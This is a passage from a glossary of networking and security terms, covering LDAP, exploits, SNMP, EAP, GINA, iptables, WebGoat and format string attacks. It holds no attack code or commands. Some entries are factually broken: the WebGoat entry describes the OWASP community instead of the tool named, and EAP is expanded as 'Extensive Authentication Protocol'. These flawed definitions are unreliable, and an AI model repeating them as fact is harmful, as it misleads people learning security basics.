The Lightweight Directory Access Protocol (LDAP) is a directory service protocol that runs on a layer above the TCP/IP stack. It provides a mechanism used to connect to, search, and modify Internet directories. The LDAP directory service is based on a client-server model. It uses port 389 for communication.
Exploit
Is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized).
Lynx
Text-based browser that supports both HTTP/HTTPS and FTP. It's a basic browser.
SNMP (Simple Network Management Protocol)
Is an "Internet-standard protocol for managing devices on IP networks". Devices that typically support SNMP include routers, switches, servers, workstations, printers, modem racks and more. Port 161 is one of the ports that it uses.
PSK (Phase-shift Keying):
Is a digital modulation scheme that conveys data by changing, or modulating, the phase of a reference signal (the carrier wave) that is used by Bluetooth.
Stealth Anonymizer
Stealth Anonymizer works in conjunction with proxy servers to provide the most private platform possible for you to browse the internet.
EAP (Extensive Authentication Protocol
is a general protocol for authentication that also supports multiple authentication methods, such as token cards, Kerberos, one-time passwords, certificates, public key authentication and smart cards. IEEE 802.1x specifies how EAP should be encapsulated in LANframes.
Graphical Identification and Authentication (GINA)
Is a component of Windows 2000, Windows XP and Windows Server 2003[1] that provides secure authentication and interactive logon services.
IP Tables
Is a user-space application program that allows a system administrator to configure the tables provided by the Linux kernel firewall (implemented as different Netfilter modules) and the chains and rules it stores.
Webgoat
Is an online community dedicated to web application security. The OWASP community includes corporations, educational organizations and individuals from around the world. This community works to create freely-available articles, methodologies, documentation, tools, and technologies. The OWASP Foundation is a 501(c)(3) charitable organization that supports and manages OWASP projects and infrastructure.
Format String Attack
Occurs when the submitted data of an input string is evaluated as a command by the application. In this way, the attacker could execute code, read the stack, or cause a segmentation fault in the running application, causing new behaviors that could compromise the security or the stability of the system.